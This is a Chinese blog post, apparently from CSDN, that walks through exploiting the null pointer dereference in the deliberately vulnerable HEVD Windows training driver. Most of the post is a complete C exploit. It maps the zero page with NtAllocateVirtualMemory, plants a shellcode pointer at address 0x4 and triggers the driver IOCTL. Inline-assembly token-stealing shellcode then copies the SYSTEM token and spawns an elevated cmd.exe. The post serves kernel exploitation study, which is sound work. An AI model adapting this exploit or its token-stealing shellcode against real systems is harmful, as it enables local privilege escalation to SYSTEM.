HEVD 内核漏洞之空指针解引用

最新推荐文章于 2023-10-10 00:13:40 发布
最新推荐文章于 2023-10-10 00:13:40 发布
阅读量300 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/101780164
版权

空指针这个其实一直是一个比较容易找到bug的点

因为一旦空指针指向了 不对的内存  就会报错   R3的程序会崩溃 R0的驱动会蓝屏                           ====

 

看一下 代码

可以看出 安全的版本就是  检查了一下 这个指针是否为空的  (其实有时候这样判断也未必一定安全)

但是  不安全的版本却没有 判断 那么 就会造成一个结果   就是会执行 代码 (0+sizeof(ULONG))处指向的代码

那么 如果看过0day安全的小伙伴 一定对这个很了解  那个demo 的解法 就是把shellcode 写到 地址0处

这个可以同样的解 ==

其中  在用  NtAllocateVirtualMemory  申请内存的时候 看准这一句话

https://baike.baidu.com/item/NtAllocateVirtualMemory/4758720

百度百科

exp 过程  ==

 

找到    NtAllocateVirtualMemory

然后 用 NtAllocateVirtualMemory 申请 地址0处的内存 

然后传入shellcode 就ok了

#include<Windows.h>
#include<stdio.h>
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)


HANDLE hDevice = NULL;



typedef NTSTATUS
(WINAPI* My_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);

My_NtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;


static VOID ShellCode()
{
	_asm
	{
			pop edi	
			pop esi
			pop ebx
			pushad
			mov eax, fs: [124h]	
			mov eax, [eax + 0x50] 
			mov ecx, eax
			mov edx, 4				

		find_sys_pid :
					 mov eax, [eax + 0xb8]	
					 sub eax, 0xb8    		
					 cmp[eax + 0xb4], edx   
					 jnz find_sys_pid
					 mov edx, [eax + 0xf8]
					 mov[ecx + 0xf8], edx
					 popad
					 ret
	}
}

static VOID CreateCmd()
{
	STARTUPINFO si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)& si, &pi);
	if (bReturn)
		CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}


int main()
{

	DWORD interVal;
	char buf[4];
	*(PDWORD32)(buf) = 0xBAD0B0B1;
	hDevice = CreateFileA(
		"\\\\.\\HackSysExtremeVulnerableDriver",
		GENERIC_READ | GENERIC_WRITE,
		NULL,
		NULL,
		OPEN_EXISTING,
		NULL,
		NULL
		);

		if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
		{
			printf("[!] open hDevice error\n");
			return 0;
		}

		*(FARPROC*)& NtAllocateVirtualMemory = GetProcAddress(
			GetModuleHandleW(L"ntdll"),
			"NtAllocateVirtualMemory");

		if (NtAllocateVirtualMemory == NULL)
		{
			printf("[!]Failed  NtAllocateVirtualMemory!!!\n");
			system("pause");
			return 0;
		}
		DWORD bReturn = 0;
		PVOID Zero_addr = (PVOID)1;
		SIZE_T RegionSize = 0x1000;
		if (!NT_SUCCESS(NtAllocateVirtualMemory(
			INVALID_HANDLE_VALUE,
			&Zero_addr,
			0,
			&RegionSize,
			MEM_COMMIT | MEM_RESERVE,
			PAGE_READWRITE)) || Zero_addr != NULL)
		{
			printf("[+]Failed to alloc zero page!\n");
			system("pause");
			return 0;
		}
		*(DWORD*)(0x4) = (DWORD)& ShellCode;
		DeviceIoControl(hDevice, 0x22202b, buf, 4, NULL, 0, &bReturn, NULL);
		CreateCmd();

		system("pause");
	  
}

 

ok 搞定一把梭====

 

参考链接

 

https://baike.baidu.com/item/NtAllocateVirtualMemory/4758720

https://bbs.pediy.com/thread-252776.htm

 

 

 

 

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【缺陷周话】第1期:空指针解引用
11-29 3300
*声明:《缺陷周话》栏目系列文章由360代码卫士团队原创出品。未经许可,禁止转载。 代码审计是使用静态分析发现源代码中安全缺陷的方法,能够辅助开发或测试人员在软件上线前较为全面地了解其安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并且已经成为安全开发生命周期SDL和D...
内核漏洞利用之CVE-2020-17382篇(下)
systemino的博客
11-26 672
在本文中,我们将以CVE-2020-17382漏洞为例来介绍内核漏洞是如何被武器化的。 在上一篇文章中,我们首先解释了攻击者为什么以驱动程序为攻击目标,然后,分析了驱动程序的组成部分,最后,讲解了驱动程序的逆向分析和调试方法。在本文中,我们将以CVE-2020-17382漏洞为例为读者介绍内核漏洞的利用过程。 攻击MSIO64.sys 现在,我们知道了如何在Ring0中获得指令指针的控制权,接下来,我们将为读者演示如何开发不同的POC。我们将要使用的shellcode是一个标准的Token Stea
HEVD3.0-第五部分-空指针解引用
qq_36918532的博客
03-07 412
前言 本篇有上一小节的知识就很简单了,因为也需要用到申请NULL页面 当指针为NULL时,存在空指针解引用漏洞,并被程序指向有效的内存区域,所以只要能控制NULL页面,然后在该地方申请内存,将shellcode放进去就行了 分析 用IDA打开HEVD.sys文件进行分析 然后打印一些东西 判断值是否等于0xBAD0B0B0 相等就进行打印和赋值的一些操作 漏洞点在第二个红框,在指针清空了之后,如果走了这个分支之后没有判断就直接调用了,这里面注意EDI的值为0也就是,call ds:[4],将这个位置放
【翻译】 Windows 内核漏洞学习—空指针解引用
dfdhxb995397的博客
08-08 214
Windows Kernel Exploitation – NullPointer Dereference 原文地址:https://osandamalith.com/2017/06/22/windows-kernel-exploitation-null-pointer-dereference/ 本文由prison翻译整理,首发i春秋 引言:Windows内核漏洞的利用和...
空指针解引用
u011339989的专栏
07-24 3194
NULL指针的访问异常是C程序员常见的bug,事实上部分情况下空指针可以解引用,下面的thread,列出了几个例子。 http://stackoverflow.com/questions/6793262/why-dereferencing-a-null-pointer-is-undefined-behaviour On the PDP-11, it happened that addres
空指针&引用&KMP
QIAN_HUAI
01-02 350
文章目录一级目录二级目录三级目录 一级目录 nullter和NULL的区别: #if 0 #include <iostream> using namespace std; //#define NULL((void*)0) //在c语言中,NULL通常被定义以上 int *a = NULL; char *pc = NULL; //在c语言中,把空指针赋给int和char时,发生了强制类型转换 //因为c++时强制型语言,void*不能隐式转换为其他类型的指针所以编译器对头文件做了想i也能够的处理
kernel-drivers-hevd-exploitation:内核驱动程序声称利用了Windows
05-16
标题“kernel-drivers-hevd-exploitation:内核驱动程序声称利用了Windows”暗示了这是一个关于Windows内核驱动程序的安全漏洞研究,可能涉及到如何发现、分析和利用这些漏洞的过程。HEVD(Hypervisor-Enforced Code ...
HEVD-Python-Solutions:用于HackSysTeam Extreme漏洞驱动程序的Python解决方案
05-04
HEVD-Python-解决方案 用于HackSysTeam Extreme漏洞驱动程序的Python解决方案
漏洞分析:HEVD-0x0.环境搭建[win7x86]
m0_64973256的博客
06-30 812
视频制作不易,求三联支持,拜谢~添加公众账号“极安御信安全研究院”,报暗号:“资料” 即可领取视频相关工具、源码、学习资料,和其他逆向工程免费课。进交流群报暗号“交流群” 网络安全交流群QQ:434238324...
HackSysExtremeVulnerableDriver:HackSys Extreme漏洞Windows驱动程序
02-06
HackSys Extreme Vulnerable Driver(HEVD)是一款专门为安全研究人员和逆向工程师设计的开源Windows内核驱动程序,它模拟了一系列的安全漏洞,旨在帮助学习和研究Windows内核级别的安全漏洞利用和防御技术。...
c语言空指针引用,关于java:C语言空指针NULL以及void指针
weixin_39921689的博客
05-19 295
C语言空指针NULL以及void指针shuimanting520 2016-05-10 07:12:12 18926 珍藏 30分类专栏: C/C++ 文章标签: C++ 指针 void NULL版权空指针NULL在C语言中,如果一个指针不指向任何数据,咱们就称之为 空指针 ,用 NULL 示意。例如:int *p = NULL;留神辨别大小写,null 没有任何非凡含意,只是一个一般的标识符。N...
C/C++this指针、空指针、野指针和引用
qq_38260691的博客
08-11 1100
1. this指针 1.0 常识性问题 当对象访问类中的非静态成员时,编译器自动将对象的地址隐式的作为第一参数传递给this指针。 类的静态成员属于整个类,不属于某一个对象,没有对象也就谈不上this指针。 编译器的实现决定this指针保存的位置。 this指针是一种特殊的指针,无法直接获取this指针的地址。 this指针并不是类的成员,不属于类的一部分。 this指...
NULL空指针解引用
weixin_44261839的博客
02-22 5390
NULL指针解引用 首先问大家一个问题就是,大家最开始使用函数(包含指针的函数),例如 size_t fwrite(const void *ptr, size_t size, size_t nmemb, FILE *stream),是否有做过一些处理判断?如果有就别往下看了,没有呢可以往下看看_ 我个人是没有的。 但是我最近在上班的时候处理一些事情的时候发现,使用这类函数是需要对指针进行null检查的,叫检查null指针解引用 为什么? 什么是空指针解引用 C语言空指针的值为null,一般null指针指向进
空指针解引用(nullpointer dereference)_空指针解引用分析
热门推荐
weixin_42508313的博客
01-27 1万+
一、 概述 1.CVE-2018-8120 是通过一个空指针解引用达到任意读写的漏洞。其实个人感觉单凭空指针 解引用的危害就是 BSOD,但是利用方面还是要配合任意读写漏洞,如果单纯的只是 BSOD 那可能充其量算一个 BUG,但是如果能配合任意读写(全称:Write What Where)那么才算 是漏洞。通过思考得出的结论就是漏洞 = BUG+利用。二、 初识空指针解引用1.空指针...
Windows内核漏洞学习-空指针解引用
WocW的博客
05-17 1271
0x00: 前言 ​ 在看雪论坛看到许多关于HEVD的Windows内核漏洞教程,其中有一个是翻译国外的一个系列,感觉讲的很好,接下来就跟着他将这个HEVD系列的漏洞走一遍了。昨天学了栈溢出,其实以前就学过,只不过没有操作过内核态的,今天继续学习空指针解引用,也是比较简单的漏洞,方便入门。 传送门 0x01: 漏洞原理 首先看漏洞程序源码 NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) { ULONG UserValue
C++学习day--18 空指针和函数指针、引用
我的博客
08-01 754
C++学习day--18 空指针和函数指针、引用
7.3 空指针和野指针
qq_32513033的博客
06-28 126
7.3 空指针和野指针 空指针: 不指向任何地址。 int* p = NULL; //p是一个空指针,无法对其解引用。 *p = 100; //错误 野指针: 指向一个非法的或已注销的内存。 //随便让p指向一个内存地址,这时再对p操作可能修改系统中的某些数据,导致未知错误。 int* p = (int*)0x1100; 睡意操作野指针是非常危险的做法,可能使电脑崩溃。 ...
linux 内核 空指针,linux-用户空间和内核空间中的空指针取消引用
weixin_33582801的博客
04-30 391
如果我们在用户空间和内核空间中取消引用空指针,将发生什么?据我了解,行为是基于编译器,体系结构等的.但通常对于分配了虚拟内存的每个用户空间程序,使用分页表使用分页将虚拟地址转换为物理地址.因此,如果我们在用户空间中取消引用空指针,则该地址无效,因此上下文切换将发生,并且在内核中基于此空指针取消引用的中断“将出现分段错误或将出现页面错误”.在内核空间中:如果我们取消引用NULL指针,则可能导致系统...
C++ :空指针解引用
LIJIWEI0611的博客
10-08 1296
123
Linux提权方法论
最新发布
大河之犬的博客
10-10 182
在执行过程中,调用者暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限。SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。在Linux/Unix中,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值